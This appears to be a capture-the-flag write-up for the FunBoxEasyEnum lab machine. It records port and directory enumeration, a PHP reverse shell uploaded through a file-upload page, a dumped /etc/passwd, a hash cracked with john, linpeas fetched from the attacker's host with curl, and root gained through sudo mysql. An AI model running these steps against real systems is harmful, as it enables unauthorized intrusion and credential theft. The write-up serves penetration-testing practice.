🐧FunBoxEasyEnum

IP : 192.168.234.132

Enumeration

Nmap:

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Apache default site at 192.168.234.132:80

gobuster dir -k -u http://192.168.234.132:80 -x txt,html,php -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

index.html (Status: 200) [Size: 10918]

/javascript (Status: 301) [Size: 323] [--> http://192.168.234.132/javascript/]

/mini.php (Status: 200) [Size: 3828]

/robots.txt (Status: 200) [Size: 21]

/phpmyadmin (Status: 301) [Size: 323] [--> http://192.168.234.132/phpmyadmin/]

Found a place to upload files at /mini.php

Uploaded PHP reverse shell.

Ran /phpshell.php

Shell

Was able to upload a php reverse shell to mini.php.

Got reverse shell.

Read /etc/psswd

$ cat /etc/passwd

root❌0:0:root:/root:/bin/bash

daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin❌2:2:bin:/bin:/usr/sbin/nologin

sys❌3:3:sys:/dev:/usr/sbin/nologin

sync❌4:65534:sync:/bin:/bin/sync

games❌5:60:games:/usr/games:/usr/sbin/nologin

man❌6:12:man:/var/cache/man:/usr/sbin/nologin

lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail❌8:8:mail:/var/mail:/usr/sbin/nologin

news❌9:9:news:/var/spool/news:/usr/sbin/nologin

uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy❌13:13:proxy:/bin:/usr/sbin/nologin

www-data❌33:33:www-data:/var/www:/usr/sbin/nologin

backup❌34:34:backup:/var/backups:/usr/sbin/nologin

list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-network❌100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin

systemd-resolve❌101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin

syslog❌102:106::/home/syslog:/usr/sbin/nologin

messagebus❌103:107::/nonexistent:/usr/sbin/nologin

_apt❌104:65534::/nonexistent:/usr/sbin/nologin

lxd❌105:65534::/var/lib/lxd/:/bin/false

uuidd❌106:110::/run/uuidd:/usr/sbin/nologin

dnsmasq❌107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin

landscape❌108:112::/var/lib/landscape:/usr/sbin/nologin

pollinate❌109:1::/var/cache/pollinate:/bin/false

sshd❌110:65534::/run/sshd:/usr/sbin/nologin

karla❌1000:1000:karla:/home/karla:/bin/bash

mysql❌111:113:MySQL Server,,,:/nonexistent:/bin/false

harry❌1001:1001:,,,:/home/harry:/bin/bash

sally❌1002:1002:,,,:/home/sally:/bin/bash

goat❌1003:1003:,,,:/home/goat:/bin/bash

oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash

lissy❌1005:1005::/home/lissy:/bin/sh

Bypassed shell restrictions : python3 -c 'import pty;pty.spawn("/bin/bash")'

john hash.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"

Use the "--format=md5crypt-long" option to force loading these as that type instead

Using default input encoding: UTF-8

Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])

Will run 8 OpenMP threads

Press 'q' or Ctrl-C to abort, almost any other key for status

hiphop (oracle)

1g 0:00:00:00 DONE (2022-11-03 17:05) 50.00g/s 19200p/s 19200c/s 19200C/s Sequel!1..sabrina

Use the "--show" option to display all of the cracked passwords reliably

Session completed.

su oracle - to switch users

Uploaded linpeas

curl http://192.168.49.234:8000/linpeas.sh -o`` linpeas.sh

Found local.txt at /var/www

cat local.txt

Redacted, get your own flag!

Had to get a hint here.... Boxes made where you are expected to guess user's passwords are stupid.

Found password for goat was goat.

Sudo -l

User has sudo perms for mysql

Root

https://gtfobins.github.io/gtfobins/mysql/#sudo

sudo mysql -e '\! /bin/sh'

Got Root Woot

PreviousSolsticeNextSumo

Last updated

Was this helpful?